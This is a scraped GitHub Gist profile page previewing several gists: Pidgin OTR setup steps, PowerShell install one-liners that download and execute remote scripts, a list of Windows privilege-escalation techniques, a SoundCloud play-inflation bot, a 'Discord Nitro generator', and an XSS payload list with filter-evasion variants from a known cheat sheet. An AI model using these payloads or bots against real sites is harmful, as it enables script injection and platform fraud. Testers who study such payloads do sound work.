Skip to content

Instantly share code, notes, and snippets.

View f13end's full-sized avatar
🏴
Making projects which help engineers to build awesome things.

f13end

🏴
Making projects which help engineers to build awesome things.
View GitHub Profile
<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<style>
body {
background: repeat url('data:image/jpeg;base64,/9j/4AAQSkZJRgABAQEASABIAAD/7QCIUGhvdG9zaG9wIDMuMAA4QklNBAQAAAAAAGscAVoAAxslRxwCAAACAAAcAnQAV8KpIENoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbGQgLSBodHRwOi8vd3d3LnJlZGJ1YmJsZS5jb20vcGVvcGxlL0NoYWV5b3VuZ1dpbGxOZXZlckNoYWVvbAD/4gxYSUNDX1BST0ZJTEUAAQEAAAxITGlubwIQAABtbnRyUkdCIFhZWiAHzgACAAkABgAxAABhY3NwTVNGVAAAAABJRUMgc1JHQgAAAAAAAAAAAAAAAAAA9tYAAQAAAADTLUhQICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABFjcHJ0AAABUAAAADNkZXNjAAABhAAAAGx3dHB0AAAB8AAAABRia3B0AAACBAAAABRyWFlaAAACGAAAABRnWFlaAAACLAAAABRiWFlaAAACQAAAABRkbW5kAAACVAAAAHBkbWRkAAACxAAAAIh2dWVkAAADTAAAAIZ2aWV3AAAD1AAAACRsdW1pAAAD+AAAABRtZWFzAAAEDAAAACR0ZWNoAAAEMAAAAAxyVFJDAAAEPAAACAxnVFJDAAAEPAAACAxiVFJDAAAEPAAACAx0ZXh0AAAAAENvcHlyaWdodCAoYykgMTk5OCBIZXdsZXR0LVBhY2thcmQgQ29tcGFueQAAZGVzYwAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAABJzUkdCIElFQzYxOTY2LTIuMQAAAAAAAA
@f13end
f13end / Twitter encryption for DM and OTR.md
Created January 1, 2019 07:41
Although encryption has never been more pervasive, with more and more services deploying strong privacy protections for users, Twitter has been slow on the following the trend. Now, one researcher has created a workaround for using end-to-end encryption with Twitter direct messages.

Pidgin (Windows and Linux)

  1. Download and install the following:
  1. After all of these are installed, start Pidgin
  2. Click Accounts -> Manage Accounts -- this will bring up the Accounts window
  3. In the Accounts window, click the Add button
  4. In the Add Account window, change the Protocol dropdown to IRC
@f13end
f13end / intro.md
Last active February 16, 2019 23:15 — forked from derhuerst/intro.md
Installing Git on Linux, Mac OS X and Windows
WINDOWS
Powershell admin olarak calistirdiktan sonra;
1- Chocolatey
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))
2- Holochain
Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/holochain/hcup/master/hcup-bootstrap.ps1'))

Windows Privilege Escalation Techniques

  1. Buffer Overflow
  2. DLL Injection
  3. DLL Hijacking
  4. Token Manipulation
  5. Insecure Files Permission
  6. Insecure Folders Permission
  7. Insecure Service Permission
  8. Insecure Registery Permission
@f13end
f13end / soundcloudbot.py
Created April 23, 2020 21:12
Auto listen for Soundcloud
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
chrome_options = Options()
# chrome_options.add_argument("--disable-extensions")
# chrome_options.add_argument("--headless")
chrome_options.add_argument("--mute-audio")
chrome_options.add_argument('--ignore-certificate-errors')
@f13end
f13end / discord.py
Created April 23, 2020 23:19
DISCORD NITRO GENERATOR
import random
import string
from colorama import init, Fore, Back, Style
import colorama
init(convert=True)
f = open('nitro_codes.txt', 'a')
amount = int(input())
fix = 1
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
XSS attacks are from http://ha.ckers.org/xss.html.
Caveats: Google.com has been programatically disallowed, but as you can see, there are ways of getting around that, so coverage in this area is not complete. Most XSS broadcasts its presence by spawning an alert dialogue. The displayed code is not strictly correct, as linebreaks have been forced for readability. Linewraps have been marked with ». Some tests are omitted for your convenience. Not all control characters are displayed.
Test
Name Raw Output Render
XSS Locator
';alert(String.fromCharCode( »
88,83,83))//\';alert(String. »
fromCharCode(88,83,83))//";a »
Udemy %100 free courses